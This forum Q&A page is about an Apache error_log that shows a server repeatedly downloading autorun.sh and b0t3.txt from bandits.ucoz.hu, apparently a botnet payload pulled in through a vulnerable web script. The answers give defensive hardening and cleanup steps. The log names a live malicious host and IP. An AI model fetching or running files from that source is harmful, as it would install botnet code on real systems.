Ping a Specific Port

Question

User4283

Asked: 2011-07-20 05:56:17 +0800 CST2011-07-20 05:56:17 +0800 CST 2011-07-20 05:56:17 +0800 CST

apache error_log

772

I'm facing problem with apache. Following logs are showing in error_log file.

--15:01:26--  http://bandits.ucoz.hu/autorun.sh
Resolving bandits.ucoz.hu... 193.109.247.50
Connecting to bandits.ucoz.hu|193.109.247.50|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 396 [application/octet-stream]
Saving to: `autorun.sh'

     0K                                                       100% 51.6M=0s

15:01:26 (51.6 MB/s) - `autorun.sh' saved [396/396]

sh: fetch: command not found
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   396  100   396    0     0  70387      0 --:--:-- --:--:-- --:--:--     0
connected.
HTTP request sent, awaiting response... 200 OK
Length: 28762 (28K) [text/plain]
Saving to: `b0t3.txt'

     0K .......... .......... ........                        100% 8.75M=0.003s

15:01:27 (8.75 MB/s) - `b0t3.txt' saved [28762/28762]

sh: fetch: command not found
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 28762  100 28762    0     0  3434k      0 --:--:-- --:--:-- --:--:-- 13.1M
sh: /usr/bin/lwp-download: /usr/bin/perl: bad interpreter: Permission denied
sh: /usr/bin/perl: Permission denied
--15:01:27--  http://bandits.ucoz.hu/autorun.sh
Resolving bandits.ucoz.hu... 193.109.247.50
Connecting to bandits.ucoz.hu|193.109.247.50|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 396 [application/octet-stream]
Saving to: `autorun.sh'

     0K                                                       100% 31.8M=0s

15:01:27 (31.8 MB/s) - `autorun.sh' saved [396/396]

sh: fetch: command not found
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   396  100   396    0     0  48768      0 --:--:-- --:--:-- --:--:--     0

How can i prevent to this issue?

2 Answers

Voted

chocripple · Answer 1 · 2011-07-20T06:25:59+08:00

Best Answer

chocripple

2011-07-20T06:25:59+08:002011-07-20T06:25:59+08:00

seems someone tried to download and running perl script using one of your webpage that might be vulnerable. - tried to disabled execution all interpreter (perl, phyton, curl, c, etc).

i assume it could be apache + php, if yes, you may be disabled: allow_url_fopen = Off, to disable downloads via PHP.
add httpd mod_security
fixed your vulnerable web page script
open outgoing firewall for certain ips/ports

2

Sean Kimball · Answer 2 · 2011-07-20T06:22:50+08:00

Sean Kimball

2011-07-20T06:22:50+08:002011-07-20T06:22:50+08:00

You have a script somewhere reaching out to grab what looks like a botnet script, trying to save it & executle locally. which is not happening as it is inthe error file.

block the bandits ip [though there are probably several more]
find that script [grep for the bandits url]
find out what that script is using to retrieve the file [block it if you can]
download & scan with rkhunter
watch your mail queue
watch for odd things in your process list

-sean

1

apache error_log

Ping a Specific Port

Check if port is open or closed on a Linux server?

How to automate SSH login with password?

How do I tell Git for Windows where to find my private RSA key?

What's the default superuser username/password for postgres after a new install?

What port does SFTP use?

Resolve host name from IP address

Command line to list users in a Windows Active Directory group?

What is a Pem file and how does it differ from other OpenSSL Generated Key File Formats?

How to determine if a bash variable is empty?